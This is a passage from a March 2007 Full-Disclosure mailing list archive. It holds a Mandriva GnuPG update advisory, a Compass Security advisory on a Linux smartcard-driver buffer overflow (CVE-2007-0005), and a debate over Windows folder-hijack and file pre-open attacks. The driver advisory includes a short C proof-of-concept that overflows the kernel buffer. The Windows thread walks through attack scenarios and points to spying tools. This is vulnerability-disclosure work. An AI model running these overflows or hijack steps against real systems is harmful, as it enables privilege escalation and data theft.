_______________________________________________________________________ Problem Description: GnuPG prior to 1.4.7 and GPGME prior to 1.1.4, when run from the command line, did not visually distinguish signed and unsigned portions of OpenPGP messages with multiple components. This could allow a remote attacker to forge the contents of an email message without detection. GnuPG 1.4.7 is being provided with this update and GPGME has been patched on Mandriva 2007.0 to provide better visual notification on these types of forgeries. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1263 _______________________________________________________________________ Updated Packages: Mandriva Linux 2006.0: ec697754fca080fa53c6c486cd91ba8c 2006.0/i586/gnupg-1.4.7-0.2.20060mdk.i586.rpm f30ab12655598264c10cee92ed76c951 2006.0/SRPMS/gnupg-1.4.7-0.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 845bfd1f359b7866e73ab2eb8b30b8fe 2006.0/x86_64/gnupg-1.4.7-0.2.20060mdk.x86_64.rpm f30ab12655598264c10cee92ed76c951 2006.0/SRPMS/gnupg-1.4.7-0.2.20060mdk.src.rpm Mandriva Linux 2007.0: c1b40e8866482c368aab5df228093ab3 2007.0/i586/gnupg-1.4.7-0.2mdv2007.0.i586.rpm 9dbf1a7a48aecb2ece048b47f4c7ade9 2007.0/i586/libgpgme11-1.1.2-2.1mdv2007.0.i586.rpm 3809f32ed3708606e6318fb7feed230d 2007.0/i586/libgpgme11-devel-1.1.2-2.1mdv2007.0.i586.rpm 62d991ccd15ca77ed37ccd4ca1bedba7 2007.0/SRPMS/gnupg-1.4.7-0.2mdv2007.0.src.rpm 31357e977acd83d777df2d77c22094f6 2007.0/SRPMS/gpgme-1.1.2-2.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: d5339dd2bc4146dd18c2ab3b4eca028d 2007.0/x86_64/gnupg-1.4.7-0.2mdv2007.0.x86_64.rpm 608bd0a86d6f83927466f23e7d73fa8d 2007.0/x86_64/lib64gpgme11-1.1.2-2.1mdv2007.0.x86_64.rpm 915d2d203fa41ce12bc661d1a89d563b 2007.0/x86_64/lib64gpgme11-devel-1.1.2-2.1mdv2007.0.x86_64.rpm 62d991ccd15ca77ed37ccd4ca1bedba7 2007.0/SRPMS/gnupg-1.4.7-0.2mdv2007.0.src.rpm 31357e977acd83d777df2d77c22094f6 2007.0/SRPMS/gpgme-1.1.2-2.1mdv2007.0.src.rpm Corporate 3.0: 36afcf2ffb12348fccdfba01b485d7fc corporate/3.0/i586/gnupg-1.4.7-0.2.C30mdk.i586.rpm ec3c9d7bf56e941e2f92a92caa8ac812 corporate/3.0/SRPMS/gnupg-1.4.7-0.2.C30mdk.src.rpm Corporate 3.0/X86_64: 250e2ef0d26f6d51aa175e32c04e29d0 corporate/3.0/x86_64/gnupg-1.4.7-0.2.C30mdk.x86_64.rpm ec3c9d7bf56e941e2f92a92caa8ac812 corporate/3.0/SRPMS/gnupg-1.4.7-0.2.C30mdk.src.rpm Corporate 4.0: e39b79ee6122b17eaefa4abb7eec8d05 corporate/4.0/i586/gnupg-1.4.7-0.2.20060mlcs4.i586.rpm 16926c5d72457c65d89124c1ebd7d0b9 corporate/4.0/SRPMS/gnupg-1.4.7-0.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 810b054fed4d7c0b2c8605bb7c3efdca corporate/4.0/x86_64/gnupg-1.4.7-0.2.20060mlcs4.x86_64.rpm 16926c5d72457c65d89124c1ebd7d0b9 corporate/4.0/SRPMS/gnupg-1.4.7-0.2.20060mlcs4.src.rpm Multi Network Firewall 2.0: 014a4338ad09dca79149509a1a0a2050 mnf/2.0/i586/gnupg-1.4.7-0.3.M20mdk.i586.rpm d513a1498ccd2ee5661fb6a9e80c5230 mnf/2.0/SRPMS/gnupg-1.4.7-0.3.M20mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF8LvpmqjQ0CJFipgRAk5yAJ4mihFJrRV8cInt9tK3IOogC6wB3gCgjW0c eMLhgVvm4msQrd936ApOrYE= =vufo -----END PGP SIGNATURE----- From i.m.crazy.frog at gmail.com Fri Mar 9 05:10:59 2007 From: i.m.crazy.frog at gmail.com (crazy frog crazy frog) Date: Fri, 9 Mar 2007 10:40:59 +0530 Subject: [Full-disclosure] Good resources on Web 2.0 In-Reply-To: <5e01c29a0703081838i1eda7c21q203e34f35f17786a@mail.gmail.com> References: <5e01c29a0703081838i1eda7c21q203e34f35f17786a@mail.gmail.com> Message-ID: <41011d980703082110y79a5a053ub71b2b26d70115e0@mail.gmail.com> secgeeks.com cgisecurity.com webappsec.com securityfocus.com www.plynt.com On 3/9/07, Michael Silk wrote: > On 3/9/07, Justin Boem wrote: > > > > > > List, > > > > I am looking for some good resources on Web 2.0 and Security. I know this > is a huge topic, but any references to good books, articles, websites, > tools, etc would be great > > "web 2.0" security is the same as any other type of web security. the same > principles apply. > > > > > > > Thanks > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > -- > mike > 00110001 <3 00110111 > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- --------------------------------------- http://www.secgeeks.com get a blog on secgeeks :) register here:- http://secgeeks.com/user/register rss feeds :- http://secgeeks.com/node/feed Submit you security articles,send them to secgeek at secgeeks.com http://www.newskicks.com Submit and kick for new stories from all around the world. --------------------------------------- From daniel.roethlisberger at csnc.ch Fri Mar 9 09:16:40 2007 From: daniel.roethlisberger at csnc.ch (Daniel Roethlisberger) Date: Fri, 9 Mar 2007 10:16:40 +0100 Subject: [Full-disclosure] Buffer Overflow in Linux Drivers for Omnikey CardMan 4040 (CVE-2007-0005) Message-ID: <20070309091640.GA23453@dragon.roe.ch> ############################################################# # # COMPASS SECURITY ADVISORY http://www.csnc.ch/ # ############################################################# # # Product: Linux Driver for Omnikey CardMan 4040 # Vendor: Omnikey GmbH / Harald Welte # Subject: Buffer Overflow # Risk: Medium # Effect: Locally exploitable # Author: Daniel Roethlisberger (daniel.roethlisberger at csnc.ch) # Date: 2007-03-07 # CVE Name: CVE-2007-0005 # ############################################################# Introduction: ------------- The Linux drivers for the Omnikey CardMan 4040 smartcard reader contain a buffer overflow vulnerability. Local attackers with direct or indirect write permissions to a cmx device file can execute arbitrary code with kernel privileges or may cause denial of service. Vulnerable: ----------- * Linux 2.4/2.6 cm4040 drivers by Omnikey: - cm4040 v1.1.0 - cm4040 v1.2.0 - cm4040 v2.0.0 * Linux 2.6 cm4040 drivers by Harald Welte, as included in: - Linux 2.6.15 ... 2.6.20.1 Not vulnerable: --------------- * Linux 2.4/2.6 cm4040 drivers by Omnikey: - cm4040 v1.0.0 * FreeBSD cmx driver by Daniel Roethlisberger Not tested: ----------- * Other Linux driver versions * Drivers for MacOS X, Windows Technical Description: ---------------------- While using the Linux drivers for the CM4040 as a reference for writing a cmx FreeBSD driver, Compass Security has discovered two buffer overflows in the Linux drivers. One of them in the write() and another one in the read() handler. When calling write() with a buffer larger than 512 bytes, the driver's write buffer overflows, allowing to overwrite the EIP and execute arbitrary code with kernel privileges. In the read() handler, there is a similar problem with data originating in the device. A malicious or buggy device sending more than 512 bytes can overflow the driver's read buffer to the same effect. Of course, the write() vulnerability is only exploitable by users with direct or indirect write access to the cmx device special file. By default, direct access is limited to root. Therefore, one might think this is not an issue. However, unprivileged users may cause large indirect writes via userland daemons such as those provided by pcsc-lite or openct. Since "normal" APDUs are smaller than 512 bytes, this may not be an issue, but I haven't looked into the various ways to cause data to be written indirectly. Furthermore, a system can be set up to allow access to the device for a special user or group in order to increase security by running the userland drivers without root privileges. In such a setup users with access to the device can escalate privileges or cause DoS. PoC Code: --------- /* * Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005) * Copyright (C) Daniel Roethlisberger * Compass Security Network Computing AG, Rapperswil, Switzerland. * All rights reserved. * http://www.csnc.ch/ */ #include #include #include #include #include #include #include int main(int argc, char *argv[]) { int fd, i, n; char buf[8192]; /* * 0 1 2 3 4 5 6 7 8 9 a b c d e f ... * 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ... */ for (i = 0; i < sizeof(buf); i += 2) { buf[i] = (char)(((i/2) & 0xFF00) >> 8); buf[i+1] = (char) ((i/2) & 0x00FF); } if ((fd = open("/dev/cmx0", O_RDWR)) < 0) { printf("Error: open() => %s\n", strerror(errno)); exit(errno); } if ((n = write(fd, buf, sizeof(buf))) < 0) { printf("Error: write() => %s\n", strerror(errno)); exit(errno); } printf("%d of %d bytes written\n", n, sizeof(buf)); exit(0); } Workaround: ----------- Patch available: http://lkml.org/lkml/2007/3/6/386 Timeline: --------- Vendor Status: Linux 2.6.21-rc3 contains the patch. Omnikey will fix it in their next driver release. Vendor Notified: 2007-02-05 (Harald Welte) 2007-02-06 (vendor-sec, Omnikey) Vendor Response: Will fix (Harald Welte, vendor-sec) Will fix but not coordinate release schedule (Omnikey) Embargo Until: 2007-03-06 -- Daniel Roethlisberger, Compass Security Network Computing AG Glaernischstrasse 7, CH-8640 Rapperswil, Switzerland Tel +41 55 214 41 77 Fax +41 55 214 41 61 daniel.roethlisberger at csnc.ch http://www.csnc.ch/ PGP: D927 96F6 7266 1683 06CF F984 ACEC DBB0 6929 2CBA Security Review - Penetration Testing - Computer Forensics From 3APA3A at SECURITY.NNOV.RU Fri Mar 9 12:09:26 2007 From: 3APA3A at SECURITY.NNOV.RU (3APA3A) Date: Fri, 9 Mar 2007 15:09:26 +0300 Subject: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues In-Reply-To: <096A04F511B7FD4995AE55F13824B8332127F5@banneretcs1.local.banneretcs.com> References: <1199291182.20070308225837@SECURITY.NNOV.RU> <096A04F511B7FD4995AE55F13824B8332127F5@banneretcs1.local.banneretcs.com> Message-ID: <1708336246.20070309150926@SECURITY.NNOV.RU> Dear Roger A. Grimes, --Friday, March 9, 2007, 7:31:54 AM, you wrote to 3APA3A at SECURITY.NNOV.RU: RAG> If Alice deletes Bob's folder (which she could do in some scenarios RAG> because she has the write/modify permission) and re-creates it, she RAG> becomes the Creator Owner and now Bob no longer has the ability to RAG> set permissions on it. As a folder owner Alice can give any permissions to Bob she wants. RAG> If I take your strange assumptions, Bob could re-discover the newly RAG> created folder that Alice made, just like she did (I mean if you make up RAG> crap scenarios, why can't I), and do the same trick back to her. He can, if he knows he must. RAG> And Windows does have a umask-like function. It's called Creator Owner. RAG> It's a well known SID, and the default permissions for it can be set so RAG> that any granular permission you want can be set to be default. I see nothing similar between Creator Owner and umask. BTW, the same article explains why Creator Owner is not 100% solution and why you should not rely on Creator Owner in case of DFS replication. RAG> Vista does have symbolic links, and Windows has supported Junction RAG> Points (similar to symbolic links) since Windows 2000. The main RAG> difference is that Junction Points could only point to local resources RAG> and symbolic links can do remote resources as well. Junction points are very close to Unix mounts, I see no any likeness to symbolic links. Junctions points (and by default, symbolic links in Vista) can only be created by administrators, it prevents symlink attack. And it's right choice. RAG> You've come up with some strange scenarios below, and in all cases I RAG> could easily defeat the problem you are suggesting by using basic, RAG> recommended, security settings. "You never know what is enough unless you know more than enough." William Blake It's quite hard to defeat the threat without knowing it. I'm disagree with you about "recommended security settings". I never saw "disconnect all users and close access to the share" or "check you are still folder owner before copy the data" in instructions on how to create file/folder with restricted access inside public one. Or "xcopy /O doesn't guarantee file can not be accessed during copy operation" or "Do not rely on Creator Owner in case of replication". RAG> Why do you spend your time coming up with such weird scenarios to RAG> focus on? Roger, have you ever used robocopy or xcopy /O? I'm not security columnist, I am system administrator/engineer. For last 10 years I develop and implement a lot of corporate directory structures, replications, and backup/restore policies for many very different organizations. I explain mistakes I can personally make and sometimes I personally did (mixing secure and insecure data, implementing automatic replication to unprotected folders, implementing data restore policies where user can ask system administrator to restore some directory structure to user accessible folder, etc). May be I'm only dumb person who does mistakes like that, most probably not. I call it "properly placed rakes to step on". RAG> You're obviously a creative guy with some Windows RAG> security smarts. Thanks. RAG> Why not focus on more realistic scenarios with RAG> more real-world use? There's plenty of them for us to focus on and RAG> to try and solve. Roger, of cause next time I should concentrate on a single-packet exploitable overflow in IPv6 stack to interest InfoWorld readers. I will not, because it's nothing interesting for me in searching yet another buffer overflow. Let another creative guys who are professional in vulnerability researching to dig it. They have tools, time and money. For me, most valuable vulnerability is one simple enough to be exploited with notepad, because it can be noted by everyone, but was unnoticed for 10 years. RAG> Roger RAG> ***************************************************************** RAG> *Roger A. Grimes, InfoWorld, Security Columnist RAG> *CPA, CISSP, MCSE: Security (2000/2003/MVP), CEH, yada...yada... 3APA3A. MCSE/MCT since Windows NT 4.0. RAG> *email: roger_grimes at infoworld.com or roger at banneretcs.com RAG> *Author of Professional Windows Desktop and Server Hardening (Wrox) RAG> *http://www.amazon.com/gp/product/0764599909 RAG> ***************************************************************** RAG> -----Original Message----- RAG> From: 3APA3A [mailto:3APA3A at SECURITY.NNOV.RU] RAG> Sent: Thursday, March 08, 2007 2:59 PM RAG> To: bugtraq at securityfocus.com; full-disclosure at lists.grok.org.uk RAG> Subject: Microsoft Windows Vista/2003/XP/2000 file management security RAG> issues RAG> This is an article I promised to publish after Windows RAG> ReadDirectoryChangesW (CVE-2007-0843) [1] issue. It should explain why RAG> you must never place secure data inside insecure directory. RAG> Title: Microsoft Windows Vista/2003/XP/2000 file management security RAG> issues RAG> Author: 3APA3A, http://securityvulns.com/ RAG> Vendor: Microsoft (and potentially another vendors) RAG> Products: Microsoft Windows Vista/2003/XP/2000, Microsoft resource kit RAG> for Windows 2000 and different utilities. RAG> Access Vector: Local RAG> Type: multiple/complex (weak design, insecure file operations, etc) RAG> Original advisory: http://securityvulns.com/advisories/winfiles.asp RAG> Securityvulns.com news: RAG> http://security.nnov.ru/news/Microsoft/Windows/files.html RAG> 0. Intro RAG> This article contains a set of attack scenarios to demonstrate security RAG> weakness in few very common Windows management practices. Neither of the RAG> problem explained is critical, yet combined together they should force RAG> you to review your security practices. I can't even say RAG> "vulnerabilities" because there is no something you can call RAG> "vulnerability". It's just something you believe is secure and it's not. RAG> 1.1 Problem: inability to create secured file / folder in public one. RAG> Attack: folder hijack attack RAG> First, it's simply impossible with standard Windows interface to create RAG> something secured in insecure folder. RAG> Scenario 1.1: RAG> Bob wishes to create "Bob private data" folder in "Public" folder to RAG> place few private files. "Public" has at least "Write" permissions for RAG> "User" group. Bob: RAG> I Creates "Bob private data" folder RAG> II Sets permission for folder to only allow access to folder RAG> himself RAG> III Copies private files into folder RAG> Alice wants to get access to folder Bob created. She RAG> Ia Immediately after folder is created, deletes "Bob private RAG> data" folder and creates "Bob private data" folder again (or RAG> simply takes ownership under "Bob private data" folder if RAG> permissions allow). It makes Alice folder owner. RAG> IIa Immediately after Bob sets permissions, she grants herself RAG> full control under folder. She can do it as a folder owner. RAG> IIIa Reads Bob's private files, because files permissions are RAG> inherited from folder RAG> Alice can use "Spydir" RAG> (http://securityvulns.com/soft/) tool to RAG> monitor files access and automate this process. As you can see, [1] RAG> elevates this problem significantly. RAG> This is not new attack. Unix has "umask" command to protect RAG> administrators and users. Currently, Windows has nothing similar. RAG> CreateFile() API supports setting file ACL on file creation (just like RAG> open() allows to set mode on POSIX systems). ACL can be securely set RAG> only on newly created files. This raises a problem of secure file RAG> creation. RAG> 1.2 Problem: Inability to lock / securely change permissions of already RAG> created file RAG> Attack: pre-open file/directory attack. RAG> There are few classes of insecure file creation attack (attempt to RAG> open existing file), exploitable under Unix with hardlinks or RAG> symlinks. It's believed Windows is not vulnerable to this attacks RAG> because RAG> I. There is no symlinks under Windows. Symlink attacks are not RAG> possible. RAG> II. Security information in NTFS is not stored as a part of RAG> directory entry, it's a part of file data. Hard link attacks are RAG> not possible. RAG> III. File locks in Windows are mandatory. It means, if one RAG> application locks the file, another application can not open RAG> this file, if user doesn't have backup privileges. It mitigate RAG> different file-based attacks. RAG> There is at least one scenario, attacker can succeed without symbolic RAG> link: to steal data written to file created without check for file RAG> existence regardless of file locks and permissions. RAG> Attack description: if attacker can predict filename to be written, he RAG> can create file, open it and share this file for all types of access. RAG> Because locking and permissions are only checked on file open, RAG> attacker retain access to the file even if it's locked and it's RAG> permissions are changed to deny file access to attacker. RAG> Exploit (or useful tool): RAG> http://securityvulns.com/files/spyfile.c RAG> Opens file, shares it for different types of access and logs changes, RAG> keeping the file open. RAG> Compiled version is available from http://securityvulns.com/soft/ RAG> Scenario 1.2.1: RAG> Bob is now aware about folder hijack attack. He use xcopy /O /U /S to RAG> synchronize his files to newly created folder. xcopy /O copies RAG> security information (ownership and permissions) before writing data RAG> to file. RAG> Alice use "Spydir" to monitor newly created folders and files in RAG> Bob's directory. She use Spyfile to create spoofed files in target RAG> directory and waits for Bob to run xcopy. Now, she has full control RAG> under content of Bob's files despite the fact she has no permissions RAG> to access these files. RAG> In a same way directory content may be monitored by pre-opening RAG> directory. RAG> Scenario 1.2.2: RAG> Enterprise directory structure is replicated every day to another RAG> user-writable location in order to alow users to recover suddenly RAG> deleted or modified files. xcopy or robocopy (from resource kit) is RAG> used for replication. Attacker can hijack content of newly created RAG> files in newly created folders. RAG> Same problem may happen on archive extraction or backup restoration. RAG> Vulnerable applications: RAG> xcopy (from all Windows versions), RAG> robocopy (Windows 2000 Resource Kit), RAG> different archivers RAG> backup restoration utilities RAG> By default, xcopy warns user the file exists, unless /Y or /U key is RAG> specified. But RAG> I. /Y is always specified for replication RAG> II. /Y can be specified via COPYCMD environment variable. COPYCMD RAG> environment variable can be created in autoexec.bat file. RAG> Different situations are possible, where autoexec.bat is writable by RAG> attacker, if: RAG> - Default Windows 2000 permissions are used or applied with domain RAG> policy [2]. RAG> - One can try to re-create autoexec.bat using POSIX subsystem RAG> III. Neither xcopy nor other utilities warn user on existing RAG> directory. Pre-open directory attack will always succeed. RAG> As you can see, [1] again dramatically elevates this problem. RAG> 1.3 Problem: user can completely block access to the files RAG> Attack: open file deletion RAG> (including Windows file replication service DoS) RAG> If files is deleted while it's open, it still present in file system RAG> under it's old name until close. Any operation on this file RAG> (including attributes requests) fails, regardless of application RAG> rights and permissions (including backup ones). RAG> Exploit: use spyfile, delete file while it's spied. Now, without RAG> closing spyfile, attempt any operation on this file (e.g. try to RAG> find it's ownership). RAG> Scenario 1.3.1 RAG> Now Bob found an copy application to securely copy files. It deletes RAG> old file before creating new one. But it fails if Alice tries to spy RAG> on Bob files, because attempt to delete file succeeds, but file RAG> still present and is unmanageable. RAG> Scenario 1.3.2 RAG> Windows file replication service (FRS) is used to replicate data RAG> between 2 public DFS folders to distribute load. Folder has RAG> permissions: RAG> Everyone: Add & read RAG> Creator Owner: Full Control RAG> Thouse, Alice has no permissions to delete files created by Bob. RAG> Replicated folder is available as a share on 2 different servers: RAG> \\SERVER1\Share and \\SERVER2\Share. Bob is connected RAG> to \\SERVER1\Share. RAG> Alice uses "Spydir" to monitor files creation by Bob. Every time Bob RAG> creates new file on \\SERVER1\Share, Alice use spyfile to create RAG> file with same name on \\SERVER2\Share. It effectively leads to FRS RAG> collision. While trying to resolve collision, FRS fails to delete RAG> file created by Alice and Bob file is deleted (original file is RAG> moved to special hidden folder only accessible by administrator). RAG> Workaround: never try to use creator-owner based permissions in RAG> replicated folders. RAG> Again, [1] seriously escalates this problem. RAG> 2. Conclusion: RAG> It's simply impossible to securely create something in public folder. RAG> At least DoS conditions are always possible. RAG> Developers should not consider mandatory file locking as a security RAG> feature. RAG> Developers should care about secure file creation to store sensitive RAG> information. CREATE_NEW should always be used and ACL should be set RAG> with lpSecurityAttributes of CreateFile. No attempt to open existing RAG> file should be made. RAG> Never try to create secure folder in public one. If you are forced, RAG> disconnect all users before this operation. RAG> Never use replication, archive extraction or backup restore to RAG> user-accessible folder. RAG> Bob and Alice should finally marry. RAG> 3. Vendor: RAG> All timelines are same with [1]. RAG> [1]. Microsoft Windows ReadDirectoryChangesW information leak RAG> (CVE-2007-0843) RAG> http://security.nnov.ru/news/Microsoft/Windows/ReadDirector.html RAG> [2]. Windows 2000 system partition weak default permissions RAG> http://securityvulns.ru/news2205.html RAG> -- RAG> http://securityvulns.com/ RAG> /\_/\ RAG> { , . } |\ RAG> +--oQQo->{ ^ }<-----+ \ RAG> | ZARAZA U 3APA3A } You know my name - look up my number (The RAG> Beatles) RAG> +-------------o66o--+ / RAG> |/ -- ~/ZARAZA http://securityvulns.com/ ?? ???? ???? ?????? ????? ?????? ? ?????? ????, ????? ? ????????. (???) From 3APA3A at SECURITY.NNOV.RU Fri Mar 9 12:40:04 2007 From: 3APA3A at SECURITY.NNOV.RU (3APA3A) Date: Fri, 9 Mar 2007 15:40:04 +0300 Subject: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues In-Reply-To: <013001c76201$2a4bd290$7ee377b0$@net> References: <1199291182.20070308225837@SECURITY.NNOV.RU> <013001c76201$2a4bd290$7ee377b0$@net> Message-ID: <1956737470.20070309154004@SECURITY.NNOV.RU> Dear M. Burnett, --Friday, March 9, 2007, 7:12:31 AM, you wrote to 3APA3A at SECURITY.NNOV.RU: MB> 3APA3A, I just wanted to say that is very clever research you have done. MB> It's true that this does require some re-thinking of security practices, but MB> I don't think it's accurate to say it's impossible to secure a private MB> folder in a public one--I believe there is a way to do it securely. Of cause, there is always a way to solve one specific problem. A solution for problem #1 has problem #2. Solution for problem #2 has problem #3. MB> There are three basic attacks you described: MB> 1. Attacker deletes a users' new folder then immediately re-creates it, MB> establishing ownership of the folder MB> 2. Attacker predicts filename, creates the file, then keeps it open for all MB> access, retaining rights on the file MB> 3. Attacker creates and deletes a file but keeps it open, denying any other MB> access to that file. And 4. By forcing irresolvable replication collision on DFS replicated folder in conjunction with [3] attacker can delete newly created files (and probably folders, I did no test) created by another user even in case of permissions like this: Users: Add & read Creator Owner: full control (or something, doesn't matter). MB> The last two attacks could be prevented by creating new files in a private MB> folder that prevents others from creating files. However, item 1 could MB> compromise the security of that folder when it is initially created. To MB> prevent that situation you would need to make sure that, within a public MB> directory, only the CREATOR OWNER can delete a folder, which I believe is MB> the default setting. MB> But, as you noticed, others can still delete that folder. There is a quirky MB> thing in NTFS that allows users to delete subfolders and files without even MB> having delete permissions on those files (see MB> http://xato.net/bl/2007/01/04/pointless-permissions/). I think that if you MB> set permissions on a folder that prevented users from deleting children, and MB> only allowed CREATOR OWNER to delete new folders, when a user creates a new MB> folder it will be secure, therefore protecting you from 2 and 3. The problem with replicated folder has no relation to NTFS permissions. It's not replication service itself, not user who deletes the file of folder, because of collision. Attacker only forces collision situation. This can not be fixed by NTFS permissions. "Add" NTFS permission is only required to remove somebody's newly created file. For replication service attacks is: 1. Victim creates Folder 2. Attacker creates Folder with same name on different replication mirror and locks it. 3. Replication service detects collision and removes Folder 4. Attacker creates Folder again 5. Folder is replicated. Attacker is now folder owner. MB> I haven't fully tested this to verify it, but I believe this would prevent MB> all the scenarios you described, although a user could still prevent the MB> initial folder creation if they could predict the filename. As you can see, there is at least one situation where your assumption is wrong, a case of DFS replication. Of cause, it still can be solved somehow, but who can guarantee it's impossible to find problem #5 in solution for problem #4? MB> Nevertheless, these are still important issues that illustrate some of the MB> confusion that the NTFS quirkiness leads to. MB> Mark Burnett MB> http://xato.net MB> -----Original Message----- MB> From: 3APA3A [mailto:3APA3A at SECURITY.NNOV.RU] MB> Sent: Thursday, March 08, 2007 12:59 PM MB> Subject: Microsoft Windows Vista/2003/XP/2000 file management security MB> issues MB> To: bugtraq at securityfocus.com; full-disclosure at lists.grok.org.uk MB> This is an article I promised to publish after Windows MB> ReadDirectoryChangesW (CVE-2007-0843) [1] issue. It should explain why MB> you must never place secure data inside insecure directory. MB> Title: Microsoft Windows Vista/2003/XP/2000 file management security issues MB> Author: 3APA3A, http://securityvulns.com/ MB> Vendor: Microsoft (and potentially another vendors) MB> Products: Microsoft Windows Vista/2003/XP/2000, Microsoft resource kit MB> for Windows 2000 and different utilities. MB> Access Vector: Local MB> Type: multiple/complex (weak design, insecure file operations, etc) MB> Original advisory: http://securityvulns.com/advisories/winfiles.asp MB> Securityvulns.com news: MB> http://security.nnov.ru/news/Microsoft/Windows/files.html MB> 0. Intro MB> This article contains a set of attack scenarios to demonstrate security MB> weakness in few very common Windows management practices. Neither of the MB> problem explained is critical, yet combined together they should force MB> you to review your security practices. I can't even say MB> "vulnerabilities" because there is no something you can call MB> "vulnerability". It's just something you believe is secure and it's not. MB> 1.1 Problem: inability to create secured file / folder in public one. MB> Attack: folder hijack attack MB> First, it's simply impossible with standard Windows interface to create MB> something secured in insecure folder. MB> Scenario 1.1: MB> Bob wishes to create "Bob private data" folder in "Public" folder to MB> place few private files. "Public" has at least "Write" permissions for MB> "User" group. Bob: MB> I Creates "Bob private data" folder MB> II Sets permission for folder to only allow access to folder himself MB> III Copies private files into folder MB> Alice wants to get access to folder Bob created. She MB> Ia Immediately after folder is created, deletes "Bob private MB> data" folder and creates "Bob private data" folder again (or MB> simply takes ownership under "Bob private data" folder if MB> permissions allow). It makes Alice folder owner. MB> IIa Immediately after Bob sets permissions, she grants herself MB> full control under folder. She can do it as a folder owner. MB> IIIa Reads Bob's private files, because files permissions are MB> inherited from folder MB> Alice can use "Spydir" (http://securityvulns.com/soft/) tool to MB> monitor files access and automate this process. As you can see, [1] MB> elevates this problem significantly. MB> This is not new attack. Unix has "umask" command to protect MB> administrators and users. Currently, Windows has nothing similar. MB> CreateFile() API supports setting file ACL on file creation (just like MB> open() allows to set mode on POSIX systems). ACL can be securely set MB> only on newly created files. This raises a problem of secure file MB> creation. MB> 1.2 Problem: Inability to lock / securely change permissions of already MB> created file MB> Attack: pre-open file/directory attack. MB> There are few classes of insecure file creation attack (attempt to MB> open existing file), exploitable under Unix with hardlinks or MB> symlinks. It's believed Windows is not vulnerable to this attacks MB> because MB> I. There is no symlinks under Windows. Symlink attacks are not MB> possible. MB> II. Security information in NTFS is not stored as a part of MB> directory entry, it's a part of file data. Hard link attacks are MB> not possible. MB> III. File locks in Windows are mandatory. It means, if one MB> application locks the file, another application can not open MB> this file, if user doesn't have backup privileges. It mitigate MB> different file-based attacks. MB> There is at least one scenario, attacker can succeed without symbolic MB> link: to steal data written to file created without check for file MB> existence regardless of file locks and permissions. MB> Attack description: if attacker can predict filename to be written, he MB> can create file, open it and share this file for all types of access. MB> Because locking and permissions are only checked on file open, MB> attacker retain access to the file even if it's locked and it's MB> permissions are changed to deny file access to attacker. MB> Exploit (or useful tool): http://securityvulns.com/files/spyfile.c MB> Opens file, shares it for different types of access and logs changes, MB> keeping the file open. MB> Compiled version is available from http://securityvulns.com/soft/ MB> Scenario 1.2.1: MB> Bob is now aware about folder hijack attack. He use xcopy /O /U /S to MB> synchronize his files to newly created folder. xcopy /O copies MB> security information (ownership and permissions) before writing data MB> to file. MB> Alice use "Spydir" to monitor newly created folders and files in MB> Bob's directory. She use Spyfile to create spoofed files in target MB> directory and waits for Bob to run xcopy. Now, she has full control MB> under content of Bob's files despite the fact she has no permissions MB> to access these files. MB> In a same way directory content may be monitored by pre-opening MB> directory. MB> Scenario 1.2.2: MB> Enterprise directory structure is replicated every day to another MB> user-writable location in order to alow users to recover suddenly MB> deleted or modified files. xcopy or robocopy (from resource kit) is MB> used for replication. Attacker can hijack content of newly created MB> files in newly created folders. MB> Same problem may happen on archive extraction or backup restoration. MB> Vulnerable applications: MB> xcopy (from all Windows versions), MB> robocopy (Windows 2000 Resource Kit), MB> different archivers MB> backup restoration utilities MB> By default, xcopy warns user the file exists, unless /Y or /U key is MB> specified. But MB> I. /Y is always specified for replication MB> II. /Y can be specified via COPYCMD environment variable. COPYCMD MB> environment variable can be created in autoexec.bat file. MB> Different situations are possible, where autoexec.bat is writable by MB> attacker, if: MB> - Default Windows 2000 permissions are used or applied with domain MB> policy [2]. MB> - One can try to re-create autoexec.bat using POSIX subsystem MB> III. Neither xcopy nor other utilities warn user on existing MB> directory. Pre-open directory attack will always succeed. MB> As you can see, [1] again dramatically elevates this problem. MB> 1.3 Problem: user can completely block access to the files MB> Attack: open file deletion MB> (including Windows file replication service DoS) MB> If files is deleted while it's open, it still present in file system MB> under it's old name until close. Any operation on this file MB> (including attributes requests) fails, regardless of application MB> rights and permissions (including backup ones). MB> Exploit: use spyfile, delete file while it's spied. Now, without MB> closing spyfile, attempt any operation on this file (e.g. try to MB> find it's ownership). MB> Scenario 1.3.1 MB> Now Bob found an copy application to securely copy files. It deletes MB> old file before creating new one. But it fails if Alice tries to spy MB> on Bob files, because attempt to delete file succeeds, but file MB> still present and is unmanageable. MB> Scenario 1.3.2 MB> Windows file replication service (FRS) is used to replicate data MB> between 2 public DFS folders to distribute load. Folder has MB> permissions: MB> Everyone: Add & read MB> Creator Owner: Full Control MB> Thouse, Alice has no permissions to delete files created by Bob. MB> Replicated folder is available as a share on 2 different servers: MB> \\SERVER1\Share and \\SERVER2\Share. Bob is connected MB> to \\SERVER1\Share. MB> Alice uses "Spydir" to monitor files creation by Bob. Every time Bob MB> creates new file on \\SERVER1\Share, Alice use spyfile to create MB> file with same name on \\SERVER2\Share. It effectively leads to FRS MB> collision. While trying to resolve collision, FRS fails to delete MB> file created by Alice and Bob file is deleted (original file is MB> moved to special hidden folder only accessible by administrator). MB> Workaround: never try to use 